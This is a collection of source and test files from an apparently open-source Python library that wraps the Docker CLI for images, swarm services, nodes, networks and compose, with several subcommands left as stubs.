    """Listing images yields no duplicate ids."""
    images = docker.image.list()
    unique_ids = {image.id for image in images}
    assert len(unique_ids) == len(images)
def test_image_bulk_reload():
    # TODO: placeholder — bulk reloading of image metadata is not exercised yet.
    pass
def test_image_list_tags():
    """A freshly pulled tag appears in the repo_tags of some listed image."""
    image_name = "busybox:1"
    docker.image.pull(image_name, quiet=True)
    if not any(image_name in image.repo_tags for image in docker.image.list()):
        raise ValueError("Tag not found in images.")
def test_pull_not_quiet():
    """Pulling without quiet=True still returns a usable Image object."""
    try:
        docker.image.remove("busybox:1")
    except DockerException:
        # The image may not be present locally; that is fine.
        pass
    pulled = docker.image.pull("busybox:1")
    assert "busybox:1" in pulled.repo_tags
json_inspect_image = """
{
"Id": "sha256:db646a8f40875981809f754e28a3834e856727b12e7662dad573b6b243e3fba4",
"RepoTags": [
"progrium/stress:latest"
],
"RepoDigests": [
"progrium/stress@sha256:e34d56d60f5caae79333cee395aae93b74791d50e3841986420d23c2ee4697bf"
],
"Parent": "",
"Comment": "",
"Created": "2014-07-20T15:21:07.696497913Z",
"Container": "f13ba377a4cf8258bce8316ab24362500fa0dc28f9e03c80a1e14550efa0f009",
"ContainerConfig": {
"Hostname": "0e6756a12879",
"Domainname": "",
"User": "",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"HOME=/",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
],
"Cmd": [
"/bin/sh",
"-c",
"#(nop) CMD []"
],
"Image": "8d2c32294d3876d8697bc10857397d6d515c1ed6942c8ae03e95e58684ae3a62",
"Volumes": null,
"WorkingDir": "",
"Entrypoint": [
"/usr/bin/stress",
"--verbose"
],
"OnBuild": [],
"Labels": null
},
"DockerVersion": "1.1.0",
"Author": "Jeff Lindsay <progrium@gmail.com>",
"Config": {
"Hostname": "0e6756a12879",
"Domainname": "",
"User": "",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"HOME=/",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
],
"Cmd": [],
"Image": "8d2c32294d3876d8697bc10857397d6d515c1ed6942c8ae03e95e58684ae3a62",
"Volumes": null,
"WorkingDir": "",
"Entrypoint": [
"/usr/bin/stress",
"--verbose"
],
"OnBuild": [],
"Labels": null
},
"Architecture": "amd64",
"Os": "linux",
"Size": 281783943,
"VirtualSize": 281783943,
"GraphDriver": {
"Data": {
"LowerDir": "/var/lib/docker/overlay2/0f34a1116ce5fc3d2814ccd4ff6c5998467bf773b50dc1f3e9de8a3e26536dda/diff:/var/lib/docker/overlay2/ecd27b6e69106899a3fcc22faa764b73f605b857b694bcbea2b1df7da672477e/diff:/var/lib/docker/overlay2/79b527d6e8e3bd3b2a90de547eb8c65d74d10d3d5b4bf2a11b8880742b6dd9e8/diff:/var/lib/docker/overlay2/176ec1f59bf4e783d29fee797c90a0baa9acdb556a5718cde195783803e11e87/diff:/var/lib/docker/overlay2/672f340dc0780643d9e07d17969a0f4ad7ead31669b22a62e369c5b374c02193/diff:/var/lib/docker/overlay2/6d1272fb84716e0c5fc155a0ccfe53ac93ffa6ca5bba4ab78f380167a2b902de/diff:/var/lib/docker/overlay2/bf0acd30d8c5f43f6dce89e3e6201e3b74fccefdd025538c363e57058a8068c7/diff:/var/lib/docker/overlay2/ebaedc0f8f09e96821a6fba4878ade18ff50dabbb4fbe432fc665a06a382383b/diff:/var/lib/docker/overlay2/6d59c976356df2d5062f720e7a0dc0eab32e0c14f3386ab2704471fa91415283/diff",
"MergedDir": "/var/lib/docker/overlay2/62be51b0b523aa51710f777229bd396b7a5e11df274243d38d8a765f87041fc7/merged",
"UpperDir": "/var/lib/docker/overlay2/62be51b0b523aa51710f777229bd396b7a5e11df274243d38d8a765f87041fc7/diff",
"WorkDir": "/var/lib/docker/overlay2/62be51b0b523aa51710f777229bd396b7a5e11df274243d38d8a765f87041fc7/work"
},
"Name": "overlay2"
},
"RootFS": {
"Type": "layers",
"Layers": [
"sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef",
"sha256:8200f77c555bbcf7537cb9257f643a07adf179015d8c0789fd8ea42c269e78e7",
"sha256:5004946741d13ef6fba4d9dbc7e6ffde72f8ead31d569b32ca9593359312aa28",
"sha256:df60166f50feff0e4f9c52812b6012691489335d697fe73ee1bda664e0f180ca",
"sha256:eb9586760c19b22518d06d0b876dfd935ed6e1ac56c66dded1e613d74ce197f2",
"sha256:8744facfa470522aa3e2945cd3359ee2ef5a9d9f27366cbc1d12df17ac472e69",
"sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"sha256:1e47ff17b890c88095e57289a40b225e95272ea058dd1397436ab9e7d196b820",
"sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
]
},
"Metadata": {
"LastTagTime": "0001-01-01T00:00:00Z"
}
}
"""
def test_parse_inspect():
    """The captured `docker image inspect` JSON parses into the model."""
    parsed = ImageInspectResult.parse_raw(json_inspect_image)
    assert parsed.repo_tags == ["progrium/stress:latest"]
def test_copy_from_and_to(tmp_path):
    """A file copied into an image can be copied back out unchanged."""
    base_image = docker.pull("busybox:1")
    (tmp_path / "dodo.txt").write_text("Hello world!")
    new_tag = random_name()
    base_image.copy_to(tmp_path / "dodo.txt", "/dada.txt", new_tag=new_tag)
    new_image = docker.image.inspect(new_tag)
    new_image.copy_from("/dada.txt", tmp_path / "dudu.txt")
    assert (tmp_path / "dodo.txt").read_text() == (tmp_path / "dudu.txt").read_text()
def test_copy_from_and_to_directory(tmp_path):
    """A whole directory round-trips through an image copy."""
    base_image = docker.pull("busybox:1")
    (tmp_path / "dodo.txt").write_text("Hello world!")
    new_tag = random_name()
    base_image.copy_to(tmp_path, "/some_path", new_tag=new_tag)
    new_image = docker.image.inspect(new_tag)
    new_image.copy_from("/some_path", tmp_path / "some_path")
    assert "Hello world!" == (tmp_path / "some_path" / "dodo.txt").read_text()
def test_many_images():
    """Pulling and inspecting a variety of images works end to end."""
    tags = (
        "ubuntu:16.04",
        "ubuntu:18.04",
        "ubuntu:20.04",
        "busybox:1",
        "traefik:v2.3.2",
        "redis:alpine3.12",
        "docker:19.03.13",
    )
    for tag in tags:
        docker.pull(tag)._get_inspect_result()
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,864 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/service.py | from datetime import datetime
from typing import Any, Dict, List, Optional, Union, overload
from python_on_whales.client_config import (
ClientConfig,
DockerCLICaller,
ReloadableObjectFromJson,
)
from python_on_whales.utils import DockerCamelModel, run, to_list
class Resources(DockerCamelModel):
    """Resource limits/reservations section of a service task template."""
    limits: Dict[str, int]
    reservations: Dict[str, int]
class ContainerSpec(DockerCamelModel):
    """Container-level settings embedded in a swarm service task template."""
    image: str
    labels: Dict[str, str]
    privileges: Dict[str, Optional[str]]
    stop_grace_period: int
    isolation: str
    env: Optional[List[str]]  # "KEY=value" strings, or None when unset
class TaskTemplate(DockerCamelModel):
    """Template describing the tasks (containers) a service spawns."""
    container_spec: ContainerSpec
    resources: Resources
class ChangeConfig(DockerCamelModel):
    """Rolling-update / rollback policy of a service.

    NOTE(review): the Docker API documents MaxFailureRatio as a float;
    the `int` annotations here may be too narrow — confirm against real
    inspect output before tightening validation.
    """
    parallelism: int
    failure_action: str
    monitor: int  # monitoring duration; presumably nanoseconds — TODO confirm
    max_failure_ratio: int
    order: str
class ServiceSpec(DockerCamelModel):
    """The user-submitted specification of a swarm service."""
    name: str
    labels: Dict[str, str]
    mode: Dict[str, Any]  # scheduling mode payload; shape not fixed here
    update_config: ChangeConfig
    rollback_config: ChangeConfig
    task_template: TaskTemplate
class ServiceInspectResult(DockerCamelModel):
    """Parsed output of `docker service inspect` for one service."""
    ID: str  # kept uppercase to match the raw JSON key
    version: Dict[str, Any]
    created_at: datetime
    updated_at: datetime
    spec: ServiceSpec
class Service(ReloadableObjectFromJson):
    """Lazy handle on a swarm service; inspect data is fetched on demand."""
    def __init__(
        self, client_config: ClientConfig, reference: str, is_immutable_id=False
    ):
        # "ID" names the JSON attribute that serves as the immutable id.
        super().__init__(client_config, "ID", reference, is_immutable_id)
    def _fetch_inspect_result_json(self, reference):
        # Raw JSON text from `docker service inspect <reference>`.
        return run(self.docker_cmd + ["service", "inspect", reference])
    def _parse_json_object(self, json_object: Dict[str, Any]) -> ServiceInspectResult:
        # Validate one inspect object against the pydantic model.
        return ServiceInspectResult.parse_obj(json_object)
    @property
    def id(self) -> str:
        """The immutable service id."""
        return self._get_immutable_id()
    @property
    def version(self) -> Dict[str, Any]:
        """The version object from the inspect result."""
        return self._get_inspect_result().version
    @property
    def created_at(self) -> datetime:
        """Creation timestamp reported by the daemon."""
        return self._get_inspect_result().created_at
    @property
    def updated_at(self) -> datetime:
        """Last-update timestamp reported by the daemon."""
        return self._get_inspect_result().updated_at
    @property
    def spec(self) -> ServiceSpec:
        """The service specification as submitted to the swarm."""
        return self._get_inspect_result().spec
# Anything accepted where a service is expected: a name/id string or a Service.
ValidService = Union[str, Service]
class ServiceCLI(DockerCLICaller):
    """`docker service` subcommands (requires swarm mode)."""
    def create(
        self,
        image: str,
        command: Union[str, List[str], None],
    ):
        """Creates a Docker swarm service.
        Consider using 'docker stack deploy' instead as it's idempotent and
        easier to read for complex applications.
        docker stack deploy is basically docker compose for swarm clusters.
        # Arguments:
            image: The image to use as the base for the service.
            command: The command to execute in the container(s).
        # Returns
            A `Service` handle on the newly created service.
        """
        # --quiet makes the CLI print only the new service's id.
        full_cmd = self.docker_cmd + ["service", "create", "--quiet"]
        full_cmd.append(image)
        if command is not None:
            for string in to_list(command):
                full_cmd.append(string)
        service_id = run(full_cmd)
        return Service(self.client_config, service_id, is_immutable_id=True)
    @overload
    def inspect(self, x: str) -> Service:
        pass
    @overload
    def inspect(self, x: List[str]) -> List[Service]:
        ...
    def inspect(self, x: Union[str, List[str]]) -> Union[Service, List[Service]]:
        """Returns one or a list of `python_on_whales.Service` object(s)."""
        if isinstance(x, str):
            return Service(self.client_config, x)
        else:
            return [Service(self.client_config, a) for a in x]
    def logs(self):
        """Not yet implemented"""
        raise NotImplementedError
    def list(self) -> List[Service]:
        """Returns the list of services
        # Returns
        A `List[python_on_whales.Services]`
        """
        full_cmd = self.docker_cmd + ["service", "list", "--quiet"]
        # One service id per output line.
        ids = run(full_cmd).splitlines()
        return [Service(self.client_config, x) for x in ids]
    def ps(self):
        """Not yet implemented"""
        raise NotImplementedError
    def remove(self, services: Union[ValidService, List[ValidService]]):
        """Removes a service
        # Arguments
        services: One or a list of services to remove.
        """
        full_cmd = self.docker_cmd + ["service", "remove"]
        for service in to_list(services):
            full_cmd.append(service)
        run(full_cmd)
    def rollback(self):
        """Not yet implemented"""
        raise NotImplementedError
    def scale(self, new_scales: Dict[ValidService, int], detach=False):
        """Scale one or more services.
        # Arguments
        new_scales: Mapping between services and the desired scales. For example
            you can provide `new_scale={"service1": 4, "service2": 8}`
        detach: If True, does not wait for the services to converge and return
            immediately.
        """
        full_cmd = self.docker_cmd + ["service", "scale"]
        full_cmd.add_flag("--detach", detach)
        for service, new_scale in new_scales.items():
            full_cmd.append(f"{str(service)}={new_scale}")
        # Stream the CLI's progress output directly to the user's terminal.
        run(full_cmd, capture_stderr=False, capture_stdout=False)
    def update(
        self,
        service: ValidService,
        detach: bool = False,
        force: bool = False,
        image: Optional[str] = None,
        with_registry_authentication: bool = False,
    ):
        """Update a service"""
        full_cmd = self.docker_cmd + ["service", "update"]
        full_cmd.add_flag("--force", force)
        full_cmd.add_simple_arg("--image", image)
        full_cmd.add_flag("--with-registry-auth", with_registry_authentication)
        full_cmd.add_flag("--detach", detach)
        full_cmd.append(service)
        run(full_cmd, capture_stdout=False)
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,865 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/swarm.py | from typing import Optional
from python_on_whales.client_config import DockerCLICaller
from python_on_whales.utils import run
class SwarmCLI(DockerCLICaller):
    """`docker swarm` subcommands: cluster membership management."""
    def ca(self):
        """Not yet implemented"""
        raise NotImplementedError
    def init(
        self,
        advertise_address: Optional[str] = None,
        autolock: bool = False,
        availability: str = "active",
        data_path_address: Optional[str] = None,
        data_path_port: Optional[int] = None,
        listen_address: Optional[str] = None,
    ) -> None:
        """Initialize a Swarm.
        If you need the token to join the new swarm from another node,
        use the [`docker.swarm.join_token`](#join_token) function.
        An example of how to initialize the whole swarm without leaving the manager
        if the manager has ssh access to the workers:
        ```python
        from python_on_whales import docker, DockerClient
        worker_docker = DockerClient(host="ssh://worker_linux_user@worker_hostname")
        # Here the docker variable is connected to the local daemon
        # worker_docker is a connected to the Docker daemon of the
        # worker through ssh, useful to control it without login to the machine
        # manually.
        docker.swarm.init()
        my_token = docker.swarm.join_token("worker") # you can set manager too
        worker_docker.swarm.join("manager_hostname:2377", token=my_token)
        ```
        # Arguments
        advertise_address: Advertised address (format: `<ip|interface>[:port]`)
        autolock: Enable manager autolocking (requiring an unlock key to start a
            stopped manager)
        availability: Availability of the node ("active"|"pause"|"drain")
        data_path_address: Address or interface to use for data path
            traffic (format is `<ip|interface>`)
        data_path_port: Port number to use for data path traffic; the
            default port (4789) is used when unset.
        listen_address: Listen address (format: `<ip|interface>[:port]`)
        """
        full_cmd = self.docker_cmd + ["swarm", "init"]
        full_cmd.add_simple_arg("--advertise-addr", advertise_address)
        full_cmd.add_flag("--autolock", autolock)
        full_cmd.add_simple_arg("--availability", availability)
        full_cmd.add_simple_arg("--data-path-addr", data_path_address)
        full_cmd.add_simple_arg("--data-path-port", data_path_port)
        full_cmd.add_simple_arg("--listen-addr", listen_address)
        run(full_cmd)
    def join(
        self,
        manager_address: str,
        advertise_address: Optional[str] = None,
        availability: str = "active",
        data_path_address: Optional[str] = None,
        listen_address: Optional[str] = None,
        token: Optional[str] = None,
    ):
        """Joins a swarm
        # Arguments
        manager_address: The address of the swarm manager in the format `"{ip}:{port}"`
        advertise_address: Advertised address (format: <ip|interface>[:port])
        availability: Availability of the node
            (`"active"`|`"pause"`|`"drain"`)
        data_path_address: Address or interface to use for data
            path traffic (format: <ip|interface>)
        listen_address: Listen address (format: <ip|interface>[:port])
            (default 0.0.0.0:2377)
        token: Token for entry into the swarm, will determine if
            the node enters the swarm as a manager or a worker.
        """
        full_cmd = self.docker_cmd + ["swarm", "join"]
        full_cmd.add_simple_arg("--advertise-addr", advertise_address)
        full_cmd.add_simple_arg("--availability", availability)
        full_cmd.add_simple_arg("--data-path-addr", data_path_address)
        full_cmd.add_simple_arg("--listen-addr", listen_address)
        full_cmd.add_simple_arg("--token", token)
        full_cmd.append(manager_address)
        run(full_cmd)
    def join_token(self, node_type: str, rotate: bool = False) -> str:
        """Obtains a token to join the swarm
        This token can then be used
        with `docker.swarm.join("manager:2377", token=my_token)`.
        # Arguments
        node_type: `"manager"` or `"worker"`
        rotate: Rotate join token
        """
        full_cmd = self.docker_cmd + ["swarm", "join-token", "--quiet"]
        full_cmd.add_flag("--rotate", rotate)
        full_cmd.append(node_type)
        return run(full_cmd)
    def leave(self, force: bool = False) -> None:
        """Leave the swarm
        # Arguments
        force: Force this node to leave the swarm, ignoring warnings
        """
        full_cmd = self.docker_cmd + ["swarm", "leave"]
        full_cmd.add_flag("--force", force)
        run(full_cmd)
    def unlock(self):
        """Not yet implemented"""
        raise NotImplementedError
    def unlock_key(self):
        """Not yet implemented"""
        raise NotImplementedError
    def update(self):
        """Not yet implemented"""
        raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,866 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/manifest.py | from python_on_whales.client_config import DockerCLICaller
class ManifestCLI(DockerCLICaller):
    """`docker manifest` subcommands (all still stubs)."""
    def annotate(self):
        """Not yet implemented"""
        raise NotImplementedError
    def create(self):
        """Not yet implemented"""
        raise NotImplementedError
    def inspect(self):
        """Not yet implemented"""
        raise NotImplementedError
    def push(self):
        """Not yet implemented"""
        raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,867 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/context.py | from python_on_whales.client_config import DockerCLICaller
class ContextCLI(DockerCLICaller):
    """`docker context` subcommands (all still stubs)."""
    def create(self):
        """Not yet implemented"""
        raise NotImplementedError
    def export(self):
        """Not yet implemented"""
        raise NotImplementedError
    # Trailing underscore avoids clashing with the `import` keyword.
    def import_(self):
        """Not yet implemented"""
        raise NotImplementedError
    def inspect(self):
        """Not yet implemented"""
        raise NotImplementedError
    def list(self):
        """Not yet implemented"""
        raise NotImplementedError
    def remove(self):
        """Not yet implemented"""
        raise NotImplementedError
    def update(self):
        """Not yet implemented"""
        raise NotImplementedError
    def use(self):
        """Not yet implemented"""
        raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,868 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/test_utils.py | import random
import string
from contextlib import contextmanager
from python_on_whales import client_config
def random_name() -> str:
    """Return a random 20-character name of lowercase letters and digits."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choices(alphabet, k=20))
@contextmanager
def set_cache_validity_period(x: float):
    """Temporarily override the client cache validity period.

    # Arguments
        x: The cache validity period (seconds) to use inside the block.

    The previous value is restored even when the body raises — the original
    implementation leaked the override on exceptions because the restore
    was not wrapped in try/finally.
    """
    old = client_config.CACHE_VALIDITY_PERIOD
    client_config.CACHE_VALIDITY_PERIOD = x
    try:
        yield
    finally:
        client_config.CACHE_VALIDITY_PERIOD = old
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,869 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/config.py | from python_on_whales.client_config import DockerCLICaller
class ConfigCLI(DockerCLICaller):
    """`docker config` subcommands (all still stubs)."""
    def create(self):
        """Not yet implemented"""
        raise NotImplementedError
    def inspect(self):
        """Not yet implemented"""
        raise NotImplementedError
    def list(self):
        """Not yet implemented"""
        raise NotImplementedError
    def remove(self):
        """Not yet implemented"""
        raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,870 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/trust.py | from python_on_whales.client_config import DockerCLICaller
class TrustCLI(DockerCLICaller):
    """`docker trust` subcommands (all still stubs)."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Placeholders for future `docker trust key` / `docker trust signer`
        # sub-CLIs; currently unused.
        self.key = None
        self.signer = None
    def inspect(self):
        """Not yet implemented"""
        raise NotImplementedError
    def revoke(self):
        """Not yet implemented"""
        raise NotImplementedError
    def sign(self):
        """Not yet implemented"""
        raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,871 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_compose.py | import os
import pytest
from python_on_whales import DockerClient
# Compose tests are slow: only run when RUN_COMPOSE_TESTS is set to a
# non-"0" value in the environment.
pytestmark = pytest.mark.skipif(
    os.getenv("RUN_COMPOSE_TESTS", "0") == "0", reason="Do not run compose tests"
)
# Client bound to the compose file exercised by every test below.
docker = DockerClient(compose_files=["./dummy_compose.yml"])
def test_docker_compose_build():
    """Build every service, then rebuild a single named service."""
    docker.compose.build()
    docker.compose.build(["my_service"])
def test_docker_compose_up_down():
    """Bring the whole stack up detached, then tear it down."""
    docker.compose.up(detach=True)
    docker.compose.down()
def test_docker_compose_up_down_some_services():
    """Bring up only a subset of services, then tear everything down."""
    docker.compose.up(["my_service", "redis"], detach=True)
    docker.compose.down()
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,872 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/__init__.py | from .components.buildx import Builder
from .components.container import Container
from .components.image import Image
from .components.network import Network
from .components.node import Node
from .components.service import Service
from .components.stack import Stack
from .components.volume import Volume
from .docker_client import DockerClient
from .utils import DockerException
# Convenience alias: a ready-made client bound to the default local daemon;
# most users only ever need this object.
docker = DockerClient()
49,873 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_node.py | import pytest
from python_on_whales import docker
@pytest.fixture
def with_swarm():
    """Run the test on a freshly initialized single-node swarm."""
    docker.swarm.init()
    yield
    # force=True: a lone manager cannot leave gracefully otherwise.
    docker.swarm.leave(force=True)
@pytest.mark.usefixtures("with_swarm")
def test_list_nodes():
    """A single-node swarm reports exactly one node."""
    nodes = docker.node.list()
    assert len(nodes) == 1
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,874 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_network.py | import pytest
from python_on_whales import DockerException, docker
from python_on_whales.components.network import NetworkInspectResult
from python_on_whales.test_utils import random_name
def test_network_create_remove():
my_name = random_name()
my_network = docker.network.create(my_name)
assert my_network.name == my_name
docker.network.remove(my_name)
network_inspect_str = """
{
"Name": "host",
"Id": "ffb3f184cd0a2077f75a507320a9613eec135dc6cb234340ea924d576215e96e",
"Created": "2020-05-04T17:50:40.0997657+02:00",
"Scope": "local",
"Driver": "host",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": null,
"Config": []
},
"Internal": false,
"Attachable": false,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {
"a8d13ad9ac75a3343da098003e22052ac6ada63fa03a216e96f549f636b5ab56": {
"Name": "gabriel_work_env",
"EndpointID": "32b9e188395d7899599382ff4a08a4897475804a4bb8e9cf1fc51c8317180947",
"MacAddress": "",
"IPv4Address": "",
"IPv6Address": ""
}
},
"Options": {},
"Labels": {}
}
"""
def test_parse_inspection():
network_parsed = NetworkInspectResult.parse_raw(network_inspect_str)
assert network_parsed.enable_ipv6 is False
assert network_parsed.driver == "host"
assert network_parsed.ipam.options is None
def test_context_manager():
from python_on_whales import docker
with pytest.raises(DockerException):
with docker.network.create(random_name()) as my_net:
docker.run(
"busybox",
["ping", "idonotexistatall.com"],
networks=[my_net],
remove=True,
)
# an exception will be raised because the container will fail
# but the network will be removed anyway.
assert my_net not in docker.network.list()
